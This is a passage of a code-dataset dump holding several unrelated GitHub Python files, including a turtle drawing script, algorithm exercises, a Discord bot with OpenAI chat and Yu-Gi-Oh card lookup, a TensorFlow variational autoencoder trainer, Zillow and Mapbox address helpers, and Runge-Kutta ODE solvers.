= \"#b81f00\", roof_height = 410, roof_fill = \"orange\") \r\nbuild_house(base_x = -350, base_y = -320, base_width = 300, base_height = 15, base_fill = \"#993300\", walls_height = 190, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 120, roof_fill = \"black\")\r\nbuild_house(base_x = -600, base_y = -320, base_width = 200, base_height = 5, base_fill = \"#993300\", walls_height = 360, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 110, roof_fill = \"red\")\r\nt.done()","repo_name":"userTOP04/knb","sub_path":"turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72620369833","text":"# M = int(input())\r\n# prices = list(map(int, input().split()))\r\n\r\nM = 10\r\nprices = [4, 3, 10, 8, 5, 6, 3, 12, 4]\r\n\r\nM = 28\r\nprices = [7, 5, 6, 8, 5, 5, 6, 10, 7]\r\n\r\n# age = \"\"\r\n# for i in range(9, 0, -1):\r\n# if prices[i-1] <= M:\r\n# age += str(i)\r\n# M -= prices[i-1]\r\n\r\n# if not age:\r\n# print(0)\r\n# else:\r\n# age = ''.join(sorted(age, reverse=True))\r\n# print(age)\r\n\r\nminPrice = min(prices)\r\nmax_digit = M//min(prices)\r\n\r\nresult = \"\"\r\n\r\n# for i in reversed(range(len(prices))):\r\ni = len(prices) - 1\r\nwhile i >= 0:\r\n # print(i)\r\n if prices[i] <= M:\r\n newM = M - prices[i]\r\n # print(\" \",newM,minPrice,newM//minPrice)\r\n if newM//minPrice == max_digit - 1:\r\n result += str(i+1)\r\n max_digit = newM//minPrice\r\n M = newM\r\n i = len(prices) - 1\r\n else:\r\n i-= 1\r\n else:\r\n i-=1\r\n\r\nprint(result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# M = 28\r\n# prices = [7, 5, 6, 8, 5, 5, 6, 10, 7]\r\n\r\n\r\n# age = \"\"\r\n# while M >= min(prices):\r\n# max_price = max([p for p in prices if p <= M])\r\n# age += str(prices.index(max_price) + 1)\r\n# M -= max_price\r\n\r\n# print(age)\r\n\r\n# digits = [(i+1, prices[i]) for i in range(9)]\r\n# digits.sort(key=lambda x: x[1], reverse=True)\r\n\r\n# max_number = \"\"\r\n# for digit, price in digits:\r\n# if price <= M:\r\n# max_number += str(digit) * (M // price)\r\n# M %= price\r\n\r\n# print(max_number if len(max_number) > 0 else \"0\")\r\n","repo_name":"ashwinnellimuttath/Algorithms-Coursework-UCR","sub_path":"birthday3.py","file_name":"birthday3.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30806360731","text":"import subtitle_visualization\r\nimport count_list_creator\r\nimport subtitles_parser\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport csv\r\n\r\n\r\ndef parse_subs(directory_path, new_directory_path):\r\n \"\"\"\r\n Parses all files in the given directory, and creates for every file a new csv file\r\n with the percent of every subtitle and its VADER rank.\r\n :param directory_path: input directory name\r\n :param new_directory_path: output directory name\r\n \"\"\"\r\n all_files = [f for f in listdir(directory_path) if isfile(join(directory_path, f))]\r\n\r\n for file_name in all_files:\r\n new_file_name = directory_path + \"/\" + file_name\r\n try:\r\n percent_lst, rank_lst = subtitles_parser.parse_sub_file(new_file_name)\r\n if percent_lst == -1:\r\n print(file_name + \" --- File opening failed\")\r\n continue\r\n else:\r\n # create a csv file that contains the percents and ranks for a single\r\n # subtitles file:\r\n with open(new_directory_path + \"/\" + file_name[:len(file_name) - 4] +\r\n \" Ranks.csv\", 'w', newline='') as rank_file:\r\n csv_writer = csv.writer(rank_file)\r\n csv_writer.writerow(percent_lst)\r\n csv_writer.writerow(rank_lst)\r\n print(file_name + \" file was created successfully\")\r\n except Exception:\r\n print(new_file_name + \" has made an error\")\r\n\r\n\r\ndef sum_peaks(mypath):\r\n \"\"\"\r\n After creating files with percents and ranks, this function iterates over all the\r\n files and for each movie it counts how many emotional peaks there are in each\r\n percentage of the movie. The results are saved in a new csv file.\r\n :param mypath: path to the directory that contains the files to iterate over\r\n \"\"\"\r\n subs_files_lst = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n res = []\r\n for file_name in subs_files_lst:\r\n with open(file=mypath+\"/\"+file_name, mode=\"r\", encoding=\"utf8\") as subtitle_file:\r\n try:\r\n # read the file:\r\n csv_reader = list(csv.reader(subtitle_file))\r\n percent_lst = csv_reader[0]\r\n rank_lst = csv_reader[1]\r\n count_lst = count_list_creator.count_emotional_peaks(percent_lst, rank_lst)\r\n if count_lst == -1:\r\n print(file_name + \" was not included\")\r\n continue\r\n res.append(count_lst)\r\n except Exception:\r\n print(file_name + \" was not included\")\r\n continue\r\n\r\n # write the results to a csv file:\r\n with open(mypath + \"All Peaks.csv\", \"w\", newline=\"\") as outfile:\r\n writer = csv.writer(outfile)\r\n for line in res:\r\n writer.writerow(line)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # call this function with (\"HollywoodSubs\", \"HollywoodRanks\") or (\"BollywoodSubs\",\r\n # \"BollywoodRanks\") to parse all subtitle files and create a file of ranks for each\r\n # one:\r\n parse_subs(\"BollywoodSubs\", \"BollywoodRanks\")\r\n\r\n # after creating rank files, call this function with \"HollywoodRanks\" or\r\n # \"BollywoodRanks\" to sum the peaks of every movie:\r\n sum_peaks(\"HollywoodRanks\")\r\n\r\n","repo_name":"josp1234/HollyBolly","sub_path":"Milestone 2/bolly_holly_main.py","file_name":"bolly_holly_main.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26126511148","text":"import numpy as np #importing the numpy module into the short name np\r\n\r\na = np.array([[1,2,3], [4,5,6], [7,8,9]]) #creates a 3x3 matrix\r\nb = a[2,:] #since python starts from a zero index, this will set be equal to the 3rd row of the a matix\r\nc = a.reshape(-1) #c will contain a single row of all the unchanged elements of matrix a because we specified an unknown\r\n #number of rows\r\nf = np.random.randn(5,1) #create a 5x1 matrix filled with random values as per standard normal distribution.\r\ng = f[f>0] #g will only be a 3x1 matrix because it will only store values greater than 0 from f's matrix\r\nx = np.zeros(10)+0.5 #x will be an array of 10 \"padded\" zeroes that also have 0.5 added to each element (10 entries\r\n # of 0.5) \r\ny = 0.5*np.ones(len(x)) #y will be an array the same length as x but padded with 1s instead. Each element is then\r\n # multiplied by 0.5\r\nz = x + y #matrix addition of x and y are stored in z (An array of 10 1s)\r\na = np.arange(1,100) #creates an array of values from 1 to 99 with even spacing with the default step size of 1\r\nb = a[::-1] #Starting from the back of the array a, copy all values into b\r\nc = np.random.permutation(10) #creates a randomly permuted array with a range of 10\r\n\r\n","repo_name":"jrsavage29/Computer-Vision","sub_path":"HW1/HW1_Problem5a.py","file_name":"HW1_Problem5a.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41382461472","text":"import discord\nimport logging\nfrom discord.ext import commands\nfrom typing import Any, Dict, List, Optional, Union\nfrom wishing_star.Exceptions import FrequentRequestRateException\nfrom wishing_star.OpenAIHandler import OpenAIHandler\nfrom wishing_star.YGOCardQueryHandler import YGOCardQueryHandler\n\n\nclass WishingStar(commands.Bot):\n \"\"\"\n This class is a derived class of discord.commands.Bot.\n\n This is the top level client that handles all the user inputs and backend\n jobs.\n \"\"\"\n\n keyword_openai_handler: str = \"Jirachi\"\n keyword_ygo_query: str = \"?ygo \"\n\n def __init__(\n self,\n command_prefix: Union[str, Any],\n logger: logging.Logger,\n credential: Dict[str, Any],\n config: Dict[str, Any],\n **options: Any,\n ):\n \"\"\"\n Initializes the client with customized data members.\n\n :param self\n :param command_prefix: The condition when the bot will be triggered by a\n command.\n :param logger: Global logging handler.\n :param credential: A dictionary that contains necessary credential keys.\n :param config: A dictionary that contains customized settings\n :param options: Other options to initialize the low level bot.\n \"\"\"\n super().__init__(command_prefix, **options)\n self.logger: logging.Logger = logger\n self.discord_key: str = credential[\"discord_key\"]\n self.openai_handler: OpenAIHandler = OpenAIHandler(credential[\"openai_key\"], logger)\n self.ygo_query_handler: YGOCardQueryHandler = YGOCardQueryHandler(logger)\n self.keyword_blacklist: List[str] = []\n if \"keyword_blacklist\" in config:\n self.keyword_blacklist = config[\"keyword_blacklist\"]\n for keyword in self.keyword_blacklist:\n self.logger.info(f\"Blacklist Keyword added: {keyword}\")\n\n def serve(self) -> None:\n \"\"\"\n Wrapper for self.run.\n\n :param self\n \"\"\"\n self.run(self.discord_key)\n\n def keyword_blacklist_detection(self, message: discord.Message) -> bool:\n \"\"\"\n Checks whether the message contains any of the keyword that should be\n blocked. The keyword list is specified in `keyword_blacklist`.\n\n :param self\n :param message: Message to check. :return True if the message contains\n any one of the keyword.\n \"\"\"\n content: str = message.content\n content = content.lower()\n for keyword in self.keyword_blacklist:\n if keyword in content:\n return True\n return False\n\n async def on_ready(self) -> None:\n assert None is not self.user\n self.logger.info(f\"Logged in as <{self.user}> ID: <{self.user.id}>\")\n\n async def process_jirachi_chatting(self, message: discord.Message, src_id: int) -> None:\n \"\"\"\n Process the input chat by redirecting the message to the OpenAI backend.\n\n :param self\n :param message: Discord message that contains the new chat.\n :param src_id: The Discord Id of the message owner. :raise\n FrequentRequestRateException: The chat is too frequent.\n \"\"\"\n try:\n chat_content: str = message.content\n chat_content = chat_content[chat_content.index(\" \") + 1 :]\n response: str = self.openai_handler.chat(chat_content, src_id)\n end_pos: int = 0\n response_len: int = len(response)\n while end_pos < response_len:\n start_pos: int = end_pos\n end_pos = min(end_pos + 1800, response_len)\n await message.reply(response[start_pos:end_pos], mention_author=True)\n except FrequentRequestRateException:\n await message.reply(\n \"T.T Jirachi gets too many questions and need to sleep for a while\",\n mention_author=True,\n )\n except Exception as e:\n self.logger.warning(e)\n\n async def on_message(self, message: discord.Message) -> None:\n \"\"\"\n Override Message handler.\n\n :param self\n :param message: Discord message received.\n \"\"\"\n assert None is not self.user\n src_id: Optional[int] = message.author.id\n\n if None is src_id:\n self.logger.warning(f\"On message: Author id not found: {str(message.author)}\")\n return\n\n if src_id == self.user.id:\n return\n\n if self.keyword_blacklist_detection(message):\n await message.delete()\n return\n\n if self.user in message.mentions:\n await self.process_jirachi_chatting(message, src_id)\n return\n\n await self.process_commands(message)\n\n\nclass WishingStarCog(commands.Cog):\n \"\"\"\n This class contains basic Wishing Star commands.\n \"\"\"\n\n def __init__(self, wishing_star: WishingStar):\n \"\"\"\n Initializes with the wishing star bot.\n\n :param self\n :param wishing_star: An instance of WishingStar bot.\n \"\"\"\n self.ws: WishingStar = wishing_star\n self.logger: logging.Logger = wishing_star.logger\n\n @commands.command()\n async def ygo(\n self, context: commands.Context, search_query: Optional[str] # type: ignore\n ) -> None:\n \"\"\"\n Processes YGO search query.\n\n :param self\n :param context: Context input from the users.\n :param search_query: Search input. It is possible to be None.\n \"\"\"\n try:\n if None is search_query or 0 == len(search_query):\n await context.reply(\"Empty Query Received.\", mention_author=True)\n return\n result_count: int = 0\n for result in self.ws.ygo_query_handler.search_query(search_query):\n await context.reply(result, mention_author=True)\n result_count += 1\n if 0 == result_count:\n await context.reply(\"No result found.\", mention_author=True)\n else:\n await context.reply(\n f\"Query complete. Total results found: {result_count}\", mention_author=True\n )\n except Exception as e:\n self.logger.warning(e)\n","repo_name":"LinZhihao-723/wishing-star","sub_path":"src/wishing_star/WishingStarClient.py","file_name":"WishingStarClient.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31981344654","text":"import collections\n\nclass Solution:\n def checkInclusion(self, pattern: str, s2: str) -> bool:\n windowSTART, matched = 0, 0\n char_frequency = collections.Counter(pattern)\n\n # our goal is to match all the characters from the 'char_frequency' with the current window\n # try to extend the range [window_start, window_end]\n for windowEND in range(len(s2)):\n\n right_char = s2[windowEND]\n\n if right_char in char_frequency:\n\n # decrement the frequency of matched character\n char_frequency[right_char] -= 1\n\n # THIS MEAN WE HAVE SUCCESSFULLY MATCHED ALL OF THIS LETTER\n # IF THE PATTERN HAD 2 'A'S, THEN THIS WOULD MEAN THAT WE HAVE 2 'A'S IN OUR WINDOW\n if char_frequency[right_char] == 0: matched += 1\n\n if matched == len(char_frequency):\n return True\n\n # shrink the window by one character because WE WILL DEFINETLY\n # NOT HAVE THE PERMUTATION IN OUR WINDOW IF OUR WINDOW IS LONGER\n # THAN THE PERMUTATION ITSELF\n if windowEND - windowSTART + 1 == len(pattern):\n left_char = s2[windowSTART]\n windowSTART += 1\n \n if left_char in char_frequency:\n if char_frequency[left_char] == 0:\n matched -= 1\n \n char_frequency[left_char] += 1\n\n return False\n \n \n\n \n \n \n\n\ndef main():\n print('Permutation exist: ' + str(find_permutation(\"oidbcaf\", \"abc\")))\n print('Permutation exist: ' + str(find_permutation(\"odicf\", \"dc\")))\n print('Permutation exist: ' + str(find_permutation(\"bcdxabcdy\", \"bcdyabcdx\")))\n print('Permutation exist: ' + str(find_permutation(\"aaacb\", \"abc\")))\n\nmain()\n","repo_name":"bailey8/Algorithms-and-Data-Structures","sub_path":"LEETCODELEETCODE/Sliding Window, 2 ptr, array/Sliding Window/permutationInString.py","file_name":"permutationInString.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2024732717","text":"import os\nimport sys\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport configargparse\nfrom tensorflow.python.ops.numpy_ops import np_config\nnp_config.enable_numpy_behavior()\nfrom utils import utils\nfrom train import train\nfrom eval import evaluate\nfrom generate import generate\nfrom reconstruct import reconstruct_img\n# from hard_code_model import VariationalAutoencoder\nfrom model import VariationalAutoencoder\nimport data_io\n\nimport numpy as np\nimport tensorflow as tf\n\ndef main(args):\n\n strategy = tf.distribute.MirroredStrategy()\n batch_size = args.batch_size\n global_batch_size = batch_size * strategy.num_replicas_in_sync\n print(f\"global batch size: {global_batch_size}\")\n print(f'Number of devices: {strategy.num_replicas_in_sync}')\n\n with strategy.scope():\n\n dataio = data_io.Data(args.data_path, global_batch_size, args.tile_size)\n\n iterator = iter(strategy.experimental_distribute_dataset(\n dataio.load_data(args.dataset))\n )\n\n steps_per_execution = dataio.data_dim[0] // global_batch_size\n\n # sys.exit()\n\n # Model Initialization\n in_shape = list(dataio.data_dim[1:])\n model_arch = utils.get_model_arch(args.model_arch)\n print(f\"model_arch: {args.model_arch}\")\n\n vae = VariationalAutoencoder(args, model_arch, global_batch_size, in_shape)\n print(f\"is using se: {vae.use_se}\\n\")\n vae.model().summary()\n\n # Set up for training, evaluation, or generation\n model_path = args.model_path\n print(f\"\\nlogging information to: {model_path}\\n\")\n \n resume_checkpoint={}\n if args.resume or args.generate:\n weight_path = model_path + '/checkpoints/' + f'model_{args.iter:06d}'\n vae.load_weights(weight_path)\n if args.resume:\n print(f\"Resume trainig...\")\n resume_checkpoint['resume_epoch'] = args.iter\n print(resume_checkpoint)\n print(f\"Model weights successfully loaded.\")\n \n # sys.exit()\n\n # Training, Generating, or Evaluating the model\n if args.generate:\n print(f\"Generating images...\")\n path_img_output = os.path.join(model_path, 'reconstruction_images') \n if (args.dataset == \"mnist\"):\n generate(vae, iterator, path_img_output)\n else:\n reconstruct_img(vae, iterator, dataio, is_plotting=True,\n img_folder=path_img_output, prefix_name='')\n else:\n if args.eval:\n print(\"Evaluation...\")\n evaluate(vae, iterator, dataio, model_path=model_path, \n save_encoding=args.save_encoding)\n else:\n # Training parameters\n epochs = args.epochs\n lr = args.learning_rate\n lr_min = args.learning_rate_min\n train_portion = args.train_portion\n \n\n # optimizer\n # decay_steps = int(dataio.data_dim[0] * train_portion) * (epochs/4)\n decay_steps = int(steps_per_execution*0.9)\n lr_schedule = tf.keras.optimizers.schedules.CosineDecayRestarts(\n lr, first_decay_steps=decay_steps,\n t_mul=2, m_mul=0.75, alpha=lr_min)\n optimizer = tf.keras.optimizers.Adamax(learning_rate=lr_schedule)\n\n train(vae, iterator, epochs=epochs, optimizer=optimizer, train_portion=train_portion,\n model_dir=model_path, batch_size=global_batch_size,\n steps_per_execution=steps_per_execution,\n kl_anneal_portion=args.kl_anneal_portion,\n epochs_til_ckpt=args.epochs_til_ckpt,\n epochs_til_summary=args.epochs_til_summary,\n resume_checkpoint=resume_checkpoint, strategy=strategy)\n\n\nif __name__ == '__main__':\n parser = configargparse.ArgumentParser()\n # data\n parser.add_argument('--dataset', type=str, default='mnist',\n choices=['mnist', 'cesm', 'isabel'],\n help='which dataset to use, default=\"mnist')\n parser.add_argument('--data_path', type=str, default='./data',\n help='location of the data corpus')\n parser.add_argument('--tile_size', type=int, default=64,\n help=\"tile size after partitioning scientific dataset\")\n # Genral training options\n parser.add_argument('--eval', action='store_true', default=False,\n help=\"run evaluation on testing dataset\")\n parser.add_argument('--save_encoding', action='store_true', default=False,\n help=\"save encoding vectors during eval\")\n parser.add_argument('--generate', action='store_true', default=False,\n help=\"run generation\")\n parser.add_argument('--model_path', default=\"./model_output/bivae\",\n help=\"Path to model folder\")\n parser.add_argument('--train_portion', type=float, default=0.95,\n help=\"train portion after spliting the original dataset\")\n # logging options\n # parser.add_argument('--experiment_name', type=str, required=True,\n # help='path to directory where checkpoints & tensorboard events will be saved.')\n parser.add_argument('--epochs_til_ckpt', type=int, default=5,\n help=\"Epochs until checkpoint is saved\")\n parser.add_argument('--epochs_til_summary', type=int, default=1,\n help=\"Number of iterations until tensorboard summary is saved\")\n parser.add_argument('--logging_root', type=str, default='./logs',\n help=\"root for logging\")\n # optimization\n parser.add_argument('--batch_size', type=int, default=32, \n help=\"batch size. default=32\")\n parser.add_argument('--learning_rate', type=float, default=1e-3,\n help='init learning rate')\n parser.add_argument('--learning_rate_min', type=float, default=5e-5,\n help='min learning rate')\n parser.add_argument('--weight_decay_norm', type=float, default=0.,\n help='The lambda parameter for spectral regularization.')\n parser.add_argument('--weight_decay_norm_init', type=float, default=10.,\n help='The initial lambda parameter')\n parser.add_argument('--weight_decay_norm_anneal', action='store_true', default=False,\n help='This flag enables annealing the lambda coefficient from '\n '--weight_decay_norm_init to --weight_decay_norm.')\n parser.add_argument('--epochs', type=int, default=100,\n help='num of training epochs')\n parser.add_argument('--warmup_epochs', type=int, default=10,\n help='num of training epochs in which lr is warmed up')\n parser.add_argument('--model_arch', type=str, default='res_wnelu',\n help='which model architecture to use')\n # KL annealing\n parser.add_argument('--kl_anneal_portion', type=float, default=0.4,\n help='The portions epochs that KL is annealed')\n # Flow params\n parser.add_argument('--num_nf', type=int, default=1,\n help='The number of normalizing flow cells per groups. Set this to zero to disable flows.')\n # latent variables\n parser.add_argument('--num_channels_of_latent', type=int, default=1,\n help='number of channels of latent variables')\n # Initial channel\n parser.add_argument('--num_initial_channel', type=int, default=16,\n help='number of channels in pre-enc and post-dec')\n # Share parameter of preprocess and post-process blocks\n parser.add_argument('--num_process_blocks', type=int, default=1,\n help='number of preprocessing and post-processing blocks')\n # Preprocess cell\n parser.add_argument('--num_preprocess_cells', type=int, default=2,\n help='number of cells per proprocess block')\n # Encoder and Decoder Tower\n parser.add_argument('--num_scales', type=int, default=2,\n help='the number of scales')\n parser.add_argument('--num_groups_per_scale', type=int, default=1,\n help='number of groups per scale')\n parser.add_argument('--is_adaptive', action='store_true', default=False,\n help='Settings this to true will set different number of groups per scale.')\n parser.add_argument('--min_groups_per_scale', type=int, default=1,\n help='the minimum number of groups per scale.')\n # encoder parameters\n parser.add_argument('--num_cell_per_group_enc', type=int, default=1,\n help='number of cells per group in encoder')\n # decoder parameters\n parser.add_argument('--num_cell_per_group_dec', type=int, default=1,\n help='number of cell per group in decoder')\n # Post-process cell\n parser.add_argument('--num_postprocess_cells', type=int, default=2,\n help='number of cells per post-process block')\n # Squeeze-and-Excitation\n parser.add_argument('--use_se', action='store_true', default=False,\n help='This flag enables squeeze and excitation.')\n # Resume\n parser.add_argument('--resume', action='store_true', default=False,\n help='This flag enables training from an existing checkpoint.')\n parser.add_argument('--iter', type=int, default=0,\n help='resume iteration')\n args = parser.parse_args()\n\n if (args.generate and (args.model_path is None)):\n parser.error('The --generate argument requires the --model_path')\n\n if (args.resume and args.iter is None):\n parser.error('The --resume argument requires the --iter')\n\n for k, v in args.__dict__.items():\n print(f\"{k}: {v}\")\n print()\n \n devices = tf.config.list_physical_devices()\n print(devices)\n print(f\"Tennsorflow version: {tf.__version__}\\n\")\n\n main(args=args)","repo_name":"hieutrungle/BiVAE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20873931065","text":"##############################################################################\n# Helper functions \n##############################################################################\nimport math\nimport random\nimport struct\n\nfrom flask import session\nimport usaddress\n\n# ZILLOW\n\n### DETAILS PER HOUSE ###\n# http://www.zillow.com/howto/api/GetDeepSearchResults.htm\n# input: address and zip\n# output: lattitude and longitude (could then be inputed into PV WATTS)\n# valutation range (high and low)\n# home value index -- avg home value in neighborhood?\n# ZPID = a zillow id (per house). used for the other zillow APIs.\n# Tax assessment,Yearbuilt,lotSizeSqFt,finishedSqFt,Bedrooms\n# *** FIPScounty *** = matches county codes in maps, census data, etc\n\ndef getText(nodelist):\n rc = []\n for node in nodelist:\n if node.nodeType == node.TEXT_NODE:\n rc.append(node.data)\n return ''.join(rc)\n\n\ndef handleTok(tokenlist):\n texts = \"\"\n for token in tokenlist:\n texts += \" \"+ getText(token.childNodes)\n return texts\n\n\n#Parse the search text into address components\ndef create_address_url(raw_address_text):\n raw_address_parsed = usaddress.tag(raw_address_text)\n address_ordered_dict = raw_address_parsed[0]\n \n address_keys = ['AddressNumber','StreetName','StreetNamePostType','OccupancyType','OccupancyIdentifier']\n address_string_list=[]\n for key in address_keys:\n if address_ordered_dict.get(key) is not None:\n address_string_list.append(address_ordered_dict[key])\n address_string = ' '.join(address_string_list)\n address_url_encode = address_string.replace(' ','+').strip()\n \n citystatezip_string = address_ordered_dict.get('PlaceName','')\n citystatezip_string += '%2C ' + address_ordered_dict.get('StateName','')\n citystatezip_string += ' ' + address_ordered_dict.get('ZipCode','')\n citystatezip_url_encode = citystatezip_string.strip().replace(' ','+')\n\n address_for_walkscore = address_url_encode + \",\" + citystatezip_url_encode\n\n return address_url_encode, citystatezip_url_encode, address_for_walkscore\n\n\n##MAKE LIST OF POSSIBLE MARKER COLORS##\ndef make_marker_colors():\n\n rbg_range = range(50, 251, 50)\n marker_rgb_list = [(r, g, b) for r in rbg_range for b in rbg_range for g in rbg_range]\n\n random.shuffle(marker_rgb_list)\n\n marker_hex_list = []\n\n for rgb_tuple in marker_rgb_list:\n hex_color_string = struct.pack('BBB', *rgb_tuple).encode('hex')\n marker_hex_list.append(hex_color_string)\n\n return marker_rgb_list, marker_hex_list \n\nRGB_TUPLES, HEX_COLOR_STRINGS = make_marker_colors()\n\n\n#Make the string for the default map API call\ndef make_marker_text(lonlat_tuples_list):\n \"\"\"Parse and join the strings that go in the mapbox api call\"\"\"\n used_color_map = session.get('used_color_map', {})\n marker_text_list = []\n # color = '84638F'\n name = 'pin-m'\n \n for index, lonlat_tuple in enumerate(lonlat_tuples_list):\n label = \"building\"\n zpid, lon, lat = lonlat_tuple\n \n color = used_color_map[str(zpid)]['hex']\n marker_text = name + '-' + label + '+' + color + '(' + str(lon) + ',' + str(lat) + ')'\n marker_text_list.append(marker_text)\n\n return marker_text_list\n\n\n#Determine optimal zoom level\ndef get_zoom_level(lat_max, lat_min, lon_max, lon_min, imgheight, imgwidth):\n \"\"\"Figure out the optimal zoom level,\n given the NE, SW bounds(max(lat, lon); min(lat, lon)) \n from the list of lon, lat tuples.\"\"\"\n\n world_dim = { 'height': 256, 'width': 256 } #always 256 px\n zoom_max = 21 #max zoom for Mapbox\n\n\n def lat_radius(lat):\n sin = math.sin(lat * math.pi / 180);\n rad_x2 = math.log((1 + sin) / (1 - sin)) / 2\n return max(min(rad_x2, math.pi), -math.pi) / 2\n\n def zoom(map_px, world_px, fraction):\n return math.floor(math.log(map_px / world_px / fraction) / math.log(2))\n\n # northeast = (lat_max, lon_max)\n # southwest = (lat_min, lon_min)\n\n lat_fraction = (lat_radius(lat_max) - lat_radius(lat_min)) / math.pi\n \n lon_diff = lon_max - lon_min\n if (lon_diff < 0):\n lon_fraction = (lon_diff + 360) / 360\n else:\n lon_fraction = (lon_diff / 360)\n\n lat_zoom = zoom(imgheight, world_dim['height'], lat_fraction)\n lon_zoom = zoom(imgwidth, world_dim['width'], lon_fraction)\n \n zoom = min([lat_zoom, lon_zoom, zoom_max])\n\n return zoom","repo_name":"antoniawang/HomespectorGadget","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31324858232","text":"import numpy as np\nfrom dataclasses import dataclass\n\na = np.array([[0,0,0],[1,2,3],[4,6,5]])\nprint(a)\nindex = np.argmax(a[1:,1:])\nprint(index)\nindx = np.unravel_index(np.argmax(a[1:,1:]),a[1:,1:].shape)\nprint(np.argmax(a))\nprint(np.unravel_index(np.argmax(a[1:,1:]),a[1:,1:].shape))\nprint(a[1:,1:][indx])\n\n\n# Structure for automatic step-size implementation statistics\n@dataclass\nclass stats:\n nsteps: int = 0 # Total number of steps --- Общее число шагов\n nrej: int = 0 # Number of rejected steps --- Число отброшенных шагов\n trej: float = 0 # Rejected steps times --- Абсциссы отброшенных шагов\n hrej: float = 0 # Rejected steps sizes --- Длины отброшенных шагов\n nfevals: int = 0 # Right-hand sides calculations --- Количество оценок правйо части (вычислений функции f)\n\n\n# Constant step Runge--Kutta solution\ndef rkconst(f, t0: float, y0: float, tfin: float, N: int, method, xi=0):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point --- начальная точка\n tfin: end time point --- конечная точка по времени\n N: number of constant steps to make --- число шагов на интервал решения\n method: reference to the method scheme for one step --- ссылка на метод для решения\n xi: the parameter for rk2step function --- параметр в методе второго порядка\n \"\"\"\n\n h = (tfin - t0) / N # step-size --- длина шага\n d = len(y0) # equations number --- число уравнений в системе\n\n # T --- times in the mesh points --- абсциссы точек сетки\n # Y --- values in the mesh points --- решение в точках сетки\n\n T = np.zeros(N + 1)\n Y = np.zeros((N + 1, d))\n\n T[0] = t0\n Y[0] = y0\n\n for i in range(N):\n new_y = method(f, T[i], Y[i], h, xi)\n new_t = T[i] + h\n T[i+1] = new_t\n Y[i+1] = new_y\n\n return T, Y.transpose()\n\n\n# Second order RK method step --- Один шаг методом второго порядка\ndef rk2step(f, t0, y0, h, xi):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point of the step --- начальная точка шага\n h: step-size --- длина шага\n xi: the parameter for rk2step function --- параметр в методе второго порядка\n \"\"\"\n \"\"\"\n xi | xi\n -----+-------------------\n |1-1/2xi 1/2xi \n \"\"\"\n c2 = xi\n a21 = xi\n\n b2 = 0.5 / c2\n b1 = 1 - b2\n\n k1 = f(t0, y0)\n k2 = f(t0 + c2*h, y0 + a21*h*k1)\n\n y1 = y0 + b1*h*k1 + b2*h*k2\n\n return y1 # value in t0 + h --- решение в t0 + h\n\n\n# Third order RK method step\ndef rk3step(f, t0, y0, h, xi):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point of the step --- начальная точка шага\n h: step-size --- длина шага\n xi : NOT USED HERE (added for compatibility with rk2step)\n \"\"\"\n\n \"\"\"\n 0 |\n 1/3 | 1/3\n 2/3 | 0 2/3\n ----+-------------------\n |1/4 0 3/4\n \"\"\"\n c2 = 1/3\n c3 = 2/3\n\n a21 = 1/3\n a32 = 2/3\n\n b1 = 1/4\n b3 = 3/4\n\n t1 = t0 + c2*h\n t2 = t0 + c3*h\n\n k1 = f(t0, y0)\n k2 = f(t1, y0 + a21*h*k1)\n k3 = f(t2, y0 + a32*h*k2)\n\n y1 = y0 + b1*h*k1 + b3*h*k3\n\n return y1 # value in t0 + h --- решение в t0 + h\n\n\n# Fourth order RK method step\ndef rk4step(f, t0, y0, h, xi):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point of the step --- начальная точка шага\n h: step-size --- длина шага\n xi : NOT USED HERE (added for compatibility with rk2step)\n \"\"\"\n \"\"\"\n 0 |\n 1/2 | 1/2\n 1/2 | 0 1/2\n 1 | 0 0 1\n ----+---------------------------\n |1/6 1/3 1/3 1/6\n \"\"\"\n c2 = 1 / 2\n c3 = 1 / 2\n c4 = 1\n\n a21 = 1 / 2\n a32 = 1 / 2\n a43 = 1\n\n b1 = 1 / 6\n b2 = 1 / 3\n b3 = 1 / 3\n b4 = 1 / 6\n\n t1 = t0 + c2 * h\n t2 = t0 + c3 * h\n t3 = t0 + c4 * h\n\n k1 = f(t0, y0)\n k2 = f(t1, y0 + a21 * h * k1)\n k3 = f(t2, y0 + a32 * h * k2)\n k4 = f(t3, y0 + a43 * h * k3)\n\n y1 = y0 + b1*h*k1 + b2*h*k2 +b3*h*k3 + b4*h*k4\n\n return y1 # value in t0 + h --- решение в t0 + h\n\n\n# Embedded RK3(2) method with FSAL: autostep (similar to ode23 in matlab)\ndef rk32f(f, t0: float, y0, tfin: float, hmax: float, tol: float):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: 